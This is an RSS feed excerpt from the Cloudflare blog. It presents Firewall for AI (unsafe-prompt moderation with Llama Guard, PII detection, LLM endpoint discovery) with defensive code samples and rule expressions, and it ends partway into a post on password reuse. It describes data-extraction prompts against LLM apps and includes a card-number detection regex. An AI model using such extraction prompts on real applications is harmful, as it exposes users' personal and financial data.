
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built and the technologies we use, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Tue, 07 Apr 2026 21:06:46 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Block unsafe prompts targeting your LLM endpoints with Firewall for AI]]></title>
            <link>https://blog.cloudflare.com/block-unsafe-llm-prompts-with-firewall-for-ai/</link>
            <pubDate>Tue, 26 Aug 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare's AI security suite now includes unsafe content moderation, integrated into the Application Security Suite via Firewall for AI.  ]]></description>
            <content:encoded><![CDATA[ <p>Security teams are racing to <a href="https://www.cloudflare.com/the-net/vulnerable-llm-ai/"><u>secure a new attack surface</u></a>: AI-powered applications. From chatbots to search assistants, LLMs are already shaping customer experience, but they also open the door to new risks. A single malicious prompt can exfiltrate sensitive data, <a href="https://www.cloudflare.com/learning/ai/data-poisoning/"><u>poison a model</u></a>, or inject toxic content into customer-facing interactions, undermining user trust. Without guardrails, even the best-trained model can be turned against the business.</p><p>Today, as part of AI Week, we’re expanding our <a href="https://www.cloudflare.com/ai-security/">AI security offerings</a> by introducing unsafe content moderation, now integrated directly into Cloudflare <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>Firewall for AI</u></a>. Built with Llama, this new feature allows customers to leverage their existing Firewall for AI engine for unified detection, analytics, and topic enforcement, providing real-time protection for <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/"><u>Large Language Models (LLMs)</u></a> at the network level. Now with just a few clicks, security and application teams can detect and block harmful prompts or topics at the edge — eliminating the need to modify application code or infrastructure.

This feature is immediately available to current Firewall for AI users. Those not yet onboarded can contact their account team to participate in the beta program.</p>
    <div>
      <h2>AI protection in application security</h2>
      <a href="#ai-protection-in-application-security">
        
      </a>
    </div>
    <p>Cloudflare's Firewall for AI <a href="https://blog.cloudflare.com/best-practices-sase-for-ai/">protects user-facing LLM applications</a> from abuse and data leaks, addressing several of the <a href="https://www.cloudflare.com/learning/ai/owasp-top-10-risks-for-llms/"><u>OWASP Top 10 LLM risks</u></a> such as prompt injection, PII disclosure, and unbound consumption. It also extends protection to other risks such as unsafe or harmful content.</p><p>Unlike built-in controls that vary between model providers, Firewall for AI is model-agnostic. It sits in front of any model you choose, whether it’s from a third party like OpenAI or Gemini, one you run in-house, or a custom model you have built, and applies the same consistent protections.</p><p>Just like our origin-agnostic <a href="https://www.cloudflare.com/application-services/#application-services-case-products"><u>Application Security suite</u></a>, Firewall for AI enforces policies at scale across all your models, creating a unified security layer. That means you can define guardrails once and apply them everywhere. For example, a financial services company might require its LLM to only respond to finance-related questions, while blocking prompts about unrelated or sensitive topics, enforced consistently across every model in use.</p>
    <div>
      <h2>Unsafe content moderation protects businesses and users</h2>
      <a href="#unsafe-content-moderation-protects-businesses-and-users">
        
      </a>
    </div>
    <p>Effective AI moderation is more than blocking “bad words”: it’s about setting boundaries that protect users, meet legal obligations, and preserve brand integrity, without over-moderating in ways that silence important voices.</p><p>Because LLMs cannot be fully scripted, their interactions are inherently unpredictable. This flexibility enables rich user experiences but also opens the door to abuse.</p><p>Key risks from unsafe prompts include misinformation, biased or offensive content, and model poisoning, where repeated harmful prompts degrade the quality and safety of future outputs. Blocking these prompts aligns with the OWASP Top 10 for LLMs, preventing both immediate misuse and long-term degradation.</p><p>One example of this is <a href="https://www.theverge.com/2016/3/24/11297050/tay-microsoft-chatbot-racist"><b><u>Microsoft’s Tay chatbot</u></b></a>. Trolls deliberately submitted toxic, racist, and offensive prompts, which Tay quickly began repeating. The failure was not only in Tay’s responses; it was in the lack of moderation on the inputs it accepted.</p>
    <div>
      <h2>Detecting unsafe prompts before reaching the model</h2>
      <a href="#detecting-unsafe-prompts-before-reaching-the-model">
        
      </a>
    </div>
    <p>Cloudflare has integrated <a href="https://huggingface.co/meta-llama/Llama-Guard-3-8B"><u>Llama Guard</u></a> directly into Firewall for AI. This brings AI input moderation into the same rules engine our customers already use to protect their applications. It uses the same approach that we created for developers building with AI in our <a href="https://blog.cloudflare.com/guardrails-in-ai-gateway/"><u>AI Gateway</u></a> product.</p><p>Llama Guard analyzes prompts in real time and flags them across multiple safety categories, including hate, violence, sexual content, criminal planning, self-harm, and more.</p><p>With this integration, Firewall for AI not only <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#discovering-llm-powered-applications"><u>discovers LLM traffic</u></a> endpoints automatically, but also enables security and AI teams to take immediate action. Unsafe prompts can be blocked before they reach the model, while flagged content can be logged or reviewed for oversight and tuning. Content safety checks can also be combined with other Application Security protections, such as <a href="https://www.cloudflare.com/application-services/products/bot-management/"><u>Bot Management</u> </a>and <a href="https://www.cloudflare.com/application-services/products/rate-limiting/"><u>Rate Limiting</u></a>, to create layered defenses when protecting your model.</p><p>The result is a single, edge-native policy layer that enforces guardrails before unsafe prompts ever reach your infrastructure — without needing complex integrations.</p>
    <div>
      <h2>How it works under the hood</h2>
      <a href="#how-it-works-under-the-hood">
        
      </a>
    </div>
    <p>Before diving into the architecture of the Firewall for AI engine and how it fits within our previously mentioned module to detect <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#using-workers-ai-to-deploy-presidio"><u>PII in the prompts</u></a>, let’s start with how we detect unsafe topics.</p>
    <div>
      <h3>Detection of unsafe topics</h3>
      <a href="#detection-of-unsafe-topics">
        
      </a>
    </div>
    <p>A key challenge in building safety guardrails is balancing accurate detection with model helpfulness. If detection is too broad, it can prevent a model from answering legitimate user questions, hurting its utility. This is especially difficult for topic detection because of the ambiguity and dynamic nature of human language, where context is fundamental to meaning.</p><p>Simple approaches like keyword blocklists can work for narrowly defined subjects, but they are insufficient on their own. They are easily bypassed and fail to understand the context in which words are used, leading to poor recall. Older probabilistic models such as <a href="https://en.wikipedia.org/wiki/Latent_Dirichlet_allocation"><u>Latent Dirichlet Allocation (LDA)</u></a> were an improvement, but did not properly account for word ordering and other contextual nuances.

Recent advancements in LLMs introduced a new paradigm. Their ability to perform zero-shot or few-shot classification is uniquely suited to the task of topic detection. For this reason, we chose <a href="https://huggingface.co/meta-llama/Llama-Guard-3-8B"><u>Llama Guard 3</u></a>, an open-source model based on the Llama architecture that is specifically fine-tuned for content safety classification. When it analyzes a prompt, it answers whether the text is safe or unsafe, and provides a specific category. We use the default categories, as listed <a href="http://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/cf.llm.prompt.unsafe_topic_categories/"><u>here</u></a>. Because Llama 3 has a fixed knowledge cutoff, certain categories — like defamation or elections — are time-sensitive. As a result, the model may not fully capture events or context that emerged after it was trained, which is important to keep in mind when relying on it.</p><p>For now, we cover the 13 default categories. We plan to expand coverage in the future, leveraging the model’s zero-shot capabilities.</p>
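    <p>To make the classification output concrete, here is a minimal JavaScript sketch that parses a Llama Guard-style verdict ("safe", or "unsafe" followed by category codes) into structured metadata. The category names follow the Llama Guard 3 model card; the exact output format and the helper itself are illustrative assumptions, not Cloudflare's internal interface.</p>

```javascript
// Llama Guard 3 hazard categories, per the model card.
const CATEGORIES = {
  S1: "Violent Crimes", S2: "Non-Violent Crimes", S3: "Sex-Related Crimes",
  S4: "Child Sexual Exploitation", S5: "Defamation", S6: "Specialized Advice",
  S7: "Privacy", S8: "Intellectual Property", S9: "Indiscriminate Weapons",
  S10: "Hate", S11: "Suicide & Self-Harm", S12: "Sexual Content", S13: "Elections",
};

// Parse a Llama Guard-style verdict into structured metadata.
// Example inputs: "safe", or "unsafe\nS10,S12".
function parseVerdict(raw) {
  const [verdict, codes = ""] = raw.trim().split("\n");
  const unsafe = verdict.trim() === "unsafe";
  const categories = unsafe
    ? codes.split(",").map((c) => c.trim()).filter((c) => c in CATEGORIES)
    : [];
  return { unsafe, categories, labels: categories.map((c) => CATEGORIES[c]) };
}
```

    <p>Metadata in this shape is what downstream systems need: a boolean for a broad block rule, and category codes for fine-grained rules like the ones shown later in this post.</p>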
    <div>
      <h3>A scalable architecture for future detections</h3>
      <a href="#a-scalable-architecture-for-future-detections">
        
      </a>
    </div>
    <p>We designed Firewall for AI, including the Llama Guard integration, to scale without adding noticeable latency, and this remains true even as we add new detection models.</p><p>To achieve this, we built a new asynchronous architecture. When a request is sent to an application protected by Firewall for AI, a Cloudflare Worker makes parallel, non-blocking requests to our different detection modules — one for PII, one for unsafe topics, and others as we add them.</p><p>Thanks to the Cloudflare network, this design scales to handle high request volumes out of the box, and latency does not increase as we add new detections. It is bounded only by the slowest model used.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Y2gTP6teVR2263UIEWHc9/9a31fb394cee6c437c1d4af6f71d867c/image3.png" />
          </figure><p>We optimize to maximize model utility while keeping guardrail detection broad enough to be effective.</p><p>Llama Guard is a rather large model, so running it at scale with minimal latency is a challenge. We deploy it on <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a>, leveraging our large fleet of high performance GPUs. This infrastructure ensures we can offer fast, reliable inference throughout our network.</p><p>To ensure the system remains fast and reliable as adoption grows, we ran extensive load tests simulating the requests per second (RPS) we anticipate, using a wide range of prompt sizes to prepare for real-world traffic. To handle this, the number of model instances deployed on our network scales automatically with the load. We employ concurrency to minimize latency and optimize for hardware utilization. We also enforce a hard 2-second threshold for each analysis; if this time limit is reached, we fall back to any detections already completed, ensuring your application's request latency is never further impacted.</p>
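    <p>The fan-out pattern described above, parallel detection calls with a hard deadline and a fallback to whatever has completed in time, can be sketched as follows. This is a simplified illustration rather than Cloudflare's Worker code; the detector functions and their result shape are hypothetical.</p>

```javascript
// Run detection modules in parallel and fall back to whatever has
// completed when the hard deadline (2 s by default) is reached.
async function runDetections(prompt, detectors, deadlineMs = 2000) {
  const results = {};
  // Each detector records its result as soon as it finishes.
  const tasks = Object.entries(detectors).map(([name, detect]) =>
    detect(prompt).then((r) => { results[name] = r; })
  );
  // Race the full set of detections against a deadline timer;
  // allSettled never rejects, so a failing detector is simply absent.
  const deadline = new Promise((resolve) => setTimeout(resolve, deadlineMs));
  await Promise.race([Promise.allSettled(tasks), deadline]);
  return results; // only detections that finished in time are present
}
```

    <p>Because the modules run concurrently, adding a new detector does not add its latency on top of the others; total time stays bounded by the slowest module or the deadline, whichever comes first.</p>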
    <div>
      <h3>From detection to security rules enforcement</h3>
      <a href="#from-detection-to-security-rules-enforcement">
        
      </a>
    </div>
    <p>Firewall for AI follows the same familiar pattern as other Application Security features like Bot Management and WAF Attack Score, making it easy to adopt.</p><p>Once enabled, the <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/#fields"><u>new fields</u></a> appear in <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> and expanded logs. From there, you can filter by unsafe topics, track trends over time, and drill into individual requests to see all detection outcomes: for example, whether unsafe topics were detected, and which categories were flagged. The request body itself (the prompt text) is not stored or exposed; only the results of the analysis are logged.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/722JxyLvT6DFQxFpQhHMYP/3f1a6aa8ef1dafe4ad1a8277578fd7ae/image2.png" />
          </figure><p>After reviewing the analytics, you can enforce unsafe topic moderation by creating rules to log or block based on prompt categories in <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom rules</u></a>.</p><p>For example, you might log prompts flagged as sexual content or hate speech for review. </p><p>You can use this expression: 
<code>If (any(cf.llm.prompt.unsafe_topic_categories[*] in {"S10" "S12"})) then Log</code>

Or deploy the rule with the categories field in the dashboard, as shown in the screenshot below.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2CUsVjjpCEqv2UQMU6cMmt/5307235338c1b58856c0685585347537/image4.png" />
          </figure><p>You can also take a broader approach by blocking all unsafe prompts outright:
<code>If (cf.llm.prompt.unsafe_topic_detected) then Block</code></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3uRT9YlRlRPsL5bNyBFA3i/54eb171ecb48aaecc7876b972789bf15/image5.png" />
          </figure><p>These rules are applied automatically to all discovered HTTP requests containing prompts, ensuring guardrails are enforced consistently across your AI traffic.</p>
    <div>
      <h2>What’s next</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>In the coming weeks, Firewall for AI will expand to detect prompt injection and jailbreak attempts. We are also exploring how to add more visibility in the analytics and logs, so teams can better validate detection results. A major part of our roadmap is adding model response handling, giving you control over not only what goes into the LLM but also what comes out. Additional abuse controls, such as rate limiting on tokens and support for more safety categories, are also on the way.</p><p>Firewall for AI is available in beta today. If you’re new to Cloudflare and want to explore how to implement these AI protections, <a href="https://www.cloudflare.com/plans/enterprise/contact/?utm_medium=referral&amp;utm_source=blog&amp;utm_campaign=2025-q3-acq-gbl-connectivity-ge-ge-general-ai_week_blog"><u>reach out for a consultation</u></a>. If you’re already with Cloudflare, contact your account team to get access and start testing with real traffic.</p><p>Cloudflare is also opening up a user research program focused on <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">AI security</a>. If you are curious about previews of new functionality or want to help shape our roadmap, <a href="https://www.cloudflare.com/lp/ai-security-user-research-program-2025"><u>express your interest here</u></a>.</p><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[AI Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[LLM]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">59hk6A3nH3YcLMjXhYnNof</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Mathias Deschamps</dc:creator>
        </item>
        <item>
            <title><![CDATA[Take control of public AI application security with Cloudflare's Firewall for AI]]></title>
            <link>https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Firewall for AI discovers and protects your public LLM-powered applications, and is seamlessly integrated with Cloudflare WAF. Join the beta now and take control of your generative AI security. ]]></description>
            <content:encoded><![CDATA[ <p>Imagine building an LLM-powered assistant trained on your developer documentation and some internal guides to quickly help customers, reduce support workload, and improve user experience. Sounds great, right? But what if sensitive data, such as employee details or internal discussions, is included in the data used to train the LLM? Attackers could manipulate the assistant into exposing sensitive data or exploit it for social engineering attacks, where they deceive individuals or systems into revealing confidential details, or use it for targeted phishing attacks. Suddenly, your helpful AI tool turns into a serious security liability. </p>
    <div>
      <h3>Introducing Firewall for AI: the easiest way to discover and protect LLM-powered apps</h3>
      <a href="#introducing-firewall-for-ai-the-easiest-way-to-discover-and-protect-llm-powered-apps">
        
      </a>
    </div>
    <p>Today, as part of Security Week 2025, we’re announcing the open beta of Firewall for AI, first <a href="https://blog.cloudflare.com/firewall-for-ai/"><u>introduced during Security Week 2024</u></a>. After talking with customers interested in protecting their LLM apps, this first beta release is focused on discovery and PII detection, and more features will follow in the future.</p><p>If you are already using Cloudflare application security, your LLM-powered applications are automatically discovered and protected, with no complex setup, no maintenance, and no extra integration needed.</p><p>Firewall for AI is an inline security solution that protects user-facing LLM-powered applications from abuse and <a href="https://www.cloudflare.com/learning/ai/how-to-secure-training-data-against-ai-data-leaks/">data leaks</a>, integrating directly with Cloudflare’s <a href="https://developers.cloudflare.com/waf/"><u>Web Application Firewall (WAF)</u></a> to provide instant protection with zero operational overhead. This integration enables organizations to leverage both AI-focused safeguards and established WAF capabilities.</p><p>Cloudflare is uniquely positioned to solve this challenge for all of our customers. As a <a href="https://www.cloudflare.com/en-gb/learning/cdn/glossary/reverse-proxy/"><u>reverse proxy</u></a>, we are model-agnostic whether the application is using a third-party LLM or an internally hosted one. By providing inline security, we can automatically <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">discover and enforce AI guardrails</a> throughout the entire request lifecycle, with zero integration or maintenance required.</p>
    <div>
      <h3>Firewall for AI beta overview</h3>
      <a href="#firewall-for-ai-beta-overview">
        
      </a>
    </div>
    <p>The beta release includes the following security capabilities:</p><p><b>Discover:</b> identify LLM-powered endpoints across your applications, an essential step for effective request and prompt analysis.</p><p><b>Detect:</b> analyze incoming request prompts to recognize potential security threats, such as attempts to extract sensitive data (e.g., “Show me transactions using 4111 1111 1111 1111”). This aligns with <a href="https://genai.owasp.org/llmrisk/llm022025-sensitive-information-disclosure/"><u>OWASP LLM02:2025 - Sensitive Information Disclosure</u></a>.</p><p><b>Mitigate:</b> enforce security controls and policies to manage the traffic that reaches your LLM, and reduce risk exposure.</p><p>Below, we review each capability in detail, exploring how they work together to create a comprehensive security framework for AI protection.</p>
    <div>
      <h3>Discovering LLM-powered applications</h3>
      <a href="#discovering-llm-powered-applications">
        
      </a>
    </div>
    <p>Companies are racing to find all possible use cases where an LLM can excel. Think about site search, a chatbot, or a shopping assistant. Regardless of the application type, our goal is to determine whether an application is powered by an LLM behind the scenes.</p><p>One possibility is to look for request path signatures similar to what major LLM providers use. For example, <a href="https://platform.openai.com/docs/api-reference/chat/create"><u>OpenAI</u></a>, <a href="https://docs.perplexity.ai/api-reference/chat-completions"><u>Perplexity</u></a> or <a href="https://docs.mistral.ai/api/#tag/chat"><u>Mistral</u></a> initiate a chat using the <code>/chat/completions</code> API endpoint. Searching through our request logs, we found only a few entries that matched this pattern across our global traffic. This result indicates that we need to consider other approaches to finding <i>any</i> application that is powered by an LLM.</p><p>Another signature to research, popular with LLM platforms, is the use of <a href="https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events/Using_server-sent_events"><u>server-sent events</u></a>. LLMs need to <a href="https://platform.openai.com/docs/guides/latency-optimization#don-t-default-to-an-llm"><u>“think”</u></a>. <a href="https://platform.openai.com/docs/api-reference/streaming"><u>Using server-sent events</u></a> improves the end user’s experience by sending over each <a href="https://help.openai.com/en/articles/4936856-what-are-tokens-and-how-to-count-them"><u>token</u></a> as soon as it is ready, creating the perception that an LLM is “thinking” like a human being. Matching on requests of server-sent events is straightforward using the response header content type of <code>text/event-stream</code>. 
This approach expands the coverage further, but does not yet cover the <a href="https://stackoverflow.blog/2022/06/02/a-beginners-guide-to-json-the-data-format-for-the-internet/"><u>majority of applications</u></a> that are using JSON format for data exchanges. Continuing the journey, our next focus is on the responses having header content type of <code>application/json</code>.</p><p>No matter how fast LLMs can be optimized to respond, when chatting with major LLMs, we often perceive them to be slow, as we have to wait for them to “think”. By plotting on how much time it takes for the origin server to respond over identified LLM endpoints (blue line) versus the rest (orange line), we can see in the left graph that origins serving LLM endpoints mostly need more than 1 second to respond, while the majority of the rest takes less than 1 second. Would we also see a clear distinction between origin server response body sizes, where the majority of LLM endpoints would respond with smaller sizes because major LLM providers <a href="https://platform.openai.com/docs/guides/safety-best-practices#constrain-user-input-and-limit-output-tokens"><u>limit output tokens</u></a>? Unfortunately not. The right graph shows that LLM response size largely overlaps with non-LLM traffic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4CkowlKelGlYueNzSrbsGn/f8091d66a6c0eb8b884c7cc6f2a128ab/1.png" />
          </figure><p>By dividing origin response size by origin response duration to calculate an effective bitrate, the distinction becomes even clearer: 80% of LLM endpoints operate below 4 KB/s.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5sJKUnLmWwnTWzUOyWVRKO/c98c8fc32dbafa5d79f21effdfc58f34/2.png" />
          </figure><p>Validating this assumption by using bitrate as a heuristic across Cloudflare’s traffic, we found that roughly 3% of all origin server responses have a bitrate lower than 4 KB/s. Are these responses all powered by LLMs? Our gut feeling tells us that it is unlikely that 3% of origin responses are LLM-powered! </p><p>Among the paths found in the 3% of matching responses, a few patterns stand out: 1) GraphQL endpoints, 2) device heartbeats or health checks, 3) generators (for QR codes, one-time passwords, invoices, etc.). Noticing this gave us the idea to filter out endpoints that have a low variance of response size over time — for instance, invoice generation is mostly based on the same template, while conversations in the LLM context have a higher variance.</p><p>A combination of filtering out known false positive patterns and low variance in response size gives us a satisfying result. These matching endpoints, approximately 30,000 of them, labelled <code>cf-llm</code>, can now be found in API Shield or Web assets, depending on your dashboard’s version, for all customers. Now you can review your endpoints and decide how to best protect them.</p>
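    <p>As a rough sketch of the combined heuristic, the function below flags an endpoint as LLM-like when its effective bitrate stays under 4 KB/s and its response sizes vary over time. The 4 KB/s threshold comes from the analysis above; the sample format and the variance cutoff are illustrative assumptions, not the production implementation.</p>

```javascript
// samples: [{ bytes, seconds }] observed for one endpoint over time.
function looksLikeLlmEndpoint(samples, maxBps = 4096, minSizeStdDev = 200) {
  // Effective bitrate: origin response size over origin response duration.
  const bps = samples.map((s) => s.bytes / s.seconds);
  const avgBps = bps.reduce((a, b) => a + b, 0) / bps.length;
  if (avgBps >= maxBps) return false; // too fast for token-by-token output

  // Filter out templated responders (QR codes, OTPs, invoices): their
  // response sizes barely vary, while LLM conversations vary widely.
  const sizes = samples.map((s) => s.bytes);
  const mean = sizes.reduce((a, b) => a + b, 0) / sizes.length;
  const variance =
    sizes.reduce((a, b) => a + (b - mean) ** 2, 0) / sizes.length;
  return Math.sqrt(variance) >= minSizeStdDev;
}
```

    <p>A slow but size-stable endpoint (an invoice generator, say) fails the variance check, while a slow endpoint with widely varying response sizes, characteristic of streamed conversations, passes both.</p>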
    <div>
      <h3>Detecting prompts designed to leak PII</h3>
      <a href="#detecting-prompts-designed-to-leak-pii">
        
      </a>
    </div>
    <p>There are multiple methods to detect PII in LLM prompts. A common method relies on <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions"><u>regular expressions (“regexes”)</u></a>, which we already use in the WAF for <a href="https://developers.cloudflare.com/waf/managed-rules/reference/sensitive-data-detection/"><u>Sensitive Data Detection</u></a> on the body of the HTTP response from the web server. Regexes offer low latency, easy customization, and straightforward implementation. However, regexes alone have limitations when applied to LLM prompts. They require frequent updates to maintain accuracy, and may struggle with more complex or implicit PII, where the information is spread across text rather than following a fixed format.</p><p>For example, regexes work well for structured data like credit card numbers and addresses, but struggle when PII is embedded in natural language. For instance, “I just booked a flight using my Chase card, ending in 1111” wouldn’t trigger a regex match, as it lacks the expected pattern, even though it reveals a partial credit card number and a financial institution.</p><p>To enhance detection, we rely on a <a href="https://www.ibm.com/think/topics/named-entity-recognition"><u>Named Entity Recognition (NER)</u></a> model, which adds a layer of intelligence to complement regex-based detection. NER models analyze text to identify contextual PII data types, such as names, phone numbers, email addresses, and credit card numbers, making detection more flexible and accurate. Cloudflare’s detection utilizes <a href="https://microsoft.github.io/presidio/"><u>Presidio</u></a>, an open-source PII detection framework, to further strengthen this approach.</p>
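    <p>To make the regex limitation concrete, consider a simplified card-number pattern (illustrative only; production detectors are more elaborate and typically validate candidates with the Luhn checksum). It catches the structured form from the earlier example but misses the same information expressed in natural language:</p>

```javascript
// Simplified credit-card pattern: four groups of four digits, optionally
// separated by spaces or dashes (illustrative; real detectors also apply
// the Luhn checksum to cut false positives).
const cardRegex = /\b\d{4}[ -]?\d{4}[ -]?\d{4}[ -]?\d{4}\b/;

const structured = "Show me transactions using 4111 1111 1111 1111";
const natural = "I just booked a flight using my Chase card, ending in 1111";

cardRegex.test(structured); // true: the full number fits the pattern
cardRegex.test(natural);    // false, though partial card data still leaks
```

    <p>The second prompt discloses a partial card number and the issuing bank, yet no fixed pattern exists for a regex to anchor on; this is the gap the NER model closes.</p>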
    <div>
      <h4>Using Workers AI to deploy Presidio</h4>
      <a href="#using-workers-ai-to-deploy-presidio">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ruqPkxJBgFCRdsoft1TO1/aa327b069569a0f952c8baea102955b8/3.png" />
          </figure><p>In our design, we leverage Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> as the fastest way to deploy <a href="https://microsoft.github.io/presidio/"><u>Presidio</u></a>. This integration allows us to process LLM app requests inline, ensuring that sensitive data is flagged before it reaches the model.</p><p>Here’s how it works:</p><p>When Firewall for AI is enabled on an application and an end user sends a request to an LLM-powered application, we pass the request to Cloudflare Workers AI, which runs it through Presidio’s NER-based detection model to identify any potential PII from the available <a href="https://microsoft.github.io/presidio/supported_entities/"><u>entities</u></a>. The output includes metadata like “Was PII found?” and “What type of PII entity?”. This output is then processed in our Firewall for AI module and handed over to other systems: <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> for visibility, and rules, such as <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom rules</u></a>, for enforcement. Custom rules allow customers to take appropriate actions on requests based on the provided metadata.</p><p>If no terminating action, like blocking, is triggered, the request proceeds to the LLM. Otherwise, it gets blocked or the appropriate action is applied before reaching the origin.</p>
    <div>
      <h3>Integrating AI security into the WAF and Analytics</h3>
      <a href="#integrating-ai-security-into-the-waf-and-analytics">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/ai-security/">Securing AI interactions</a> shouldn't require complex integrations. Firewall for AI is seamlessly built into Cloudflare’s WAF, allowing customers to enforce security policies before prompts reach LLM endpoints. With this integration, there are <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/#fields"><u>new fields available</u></a> in Custom and Rate limiting rules. The rules can be used to take immediate action, such as blocking or logging risky prompts in real time.</p><p>For example, security teams can filter LLM traffic to analyze requests containing PII-related prompts. Using Cloudflare’s WAF rules engine, they can create custom security policies tailored to their AI applications.</p><p>Here’s what a rule to block detected PII prompts looks like:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4cvlFU0sia6dZly2LZGG8l/670dbb1ad5068f0fd5d8f4afde9e9e02/4.png" />
          </figure><p>Alternatively, if an organization wants to allow certain PII categories, such as location data, they can create an exception rule:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/wYFkoQyHFoFNwHmKtaaG3/94c7ae78dbabacf5dd8583af9e8eb071/5.png" />
          </figure><p>In addition to the rules, users can gain visibility into LLM interactions, detect potential risks, and enforce security controls using <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> and <a href="https://developers.cloudflare.com/waf/analytics/security-events/"><u>Security Events</u></a>. You can find more details in our <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentation</u></a>.</p>
    <div>
      <h3>What's next: token counting, guardrails, and beyond</h3>
      <a href="#whats-next-token-counting-guardrails-and-beyond">
        
      </a>
    </div>
    <p>Beyond PII detection and creating security rules, we’re developing additional capabilities to strengthen AI security for our customers. The next feature we’ll release is token counting, which analyzes prompt structure and length. Customers can use the token count field in Rate Limiting and WAF Custom rules to prevent their users from sending very long prompts, which can inflate third-party model bills or allow users to abuse the models. This will be followed by AI-based content moderation detections, which will provide more flexibility in building guardrails into rules.</p><p>If you're an enterprise customer, join the Firewall for AI beta today! Contact your customer team to start monitoring traffic, building protection rules, and taking control of your LLM traffic.</p>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[LLM]]></category>
            <category><![CDATA[Web Asset Discovery]]></category>
            <guid isPermaLink="false">5XoyHPSrtBH8pPvUJkOXMD</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[Password reuse is rampant: nearly half of observed user logins are compromised]]></title>
            <link>https://blog.cloudflare.com/password-reuse-rampant-half-user-logins-compromised/</link>
            <pubDate>Mon, 17 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Nearly half of observed login attempts across websites protected by Cloudflare involved leaked credentials. The pervasive issue of password reuse is enabling automated bot attacks on a massive scale. ]]></description>
            <content:encoded><![CDATA[ <p>Accessing private content online, whether it's checking email or streaming your favorite show, almost always starts with a “login” step. Beneath this everyday task lies a widespread human mistake we still have not resolved: <b>password reuse</b>. Many users recycle passwords across multiple services, creating a ripple effect of risk when their credentials are leaked.</p><p>Based on Cloudflare's observed traffic between September and November 2024, <b>41% of successful logins across websites protected by Cloudflare involve compromised passwords.</b> In this post, we’ll explore the widespread impact of password reuse, focusing on how it affects popular Content Management Systems (CMS), the behavior of bots versus humans in login attempts, and how attackers exploit stolen credentials to take over accounts at scale.</p>
    <div>
      <h3>Scope of the analysis</h3>
      <a href="#scope-of-the-analysis">
        
      </a>
    </div>
    <p>As part of our <a href="https://www.cloudflare.com/application-services/solutions/">Application Security</a> offering, we offer a free feature that checks if a password has been leaked in a known data breach of another service or application on the Internet. When we perform these checks, Cloudflare does not access or store plaintext end user passwords. We have built a privacy-preserving credential checking service that helps protect our users from compromised credentials. <a href="https://blog.cloudflare.com/helping-keep-customers-safe-with-leaked-password-notification/#how-does-cloudflare-check-for-leaked-credentials"><u>Passwords are hashed – i.e., converted into a random string of characters using a cryptographic algorithm – for the purpose of comparing them against a database of leaked credentials.</u></a> This not only warns site owners that their end users’ credentials may be compromised; it also allows site owners to issue a password reset or enable MFA. These protections help prevent attacks that use automated attempts to guess information, like usernames and passwords, to gain access to a system or network. Read more on how our leaked credentials detection scans work <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>here</u></a>.</p><p>Our data analysis focuses on traffic from Internet properties on <a 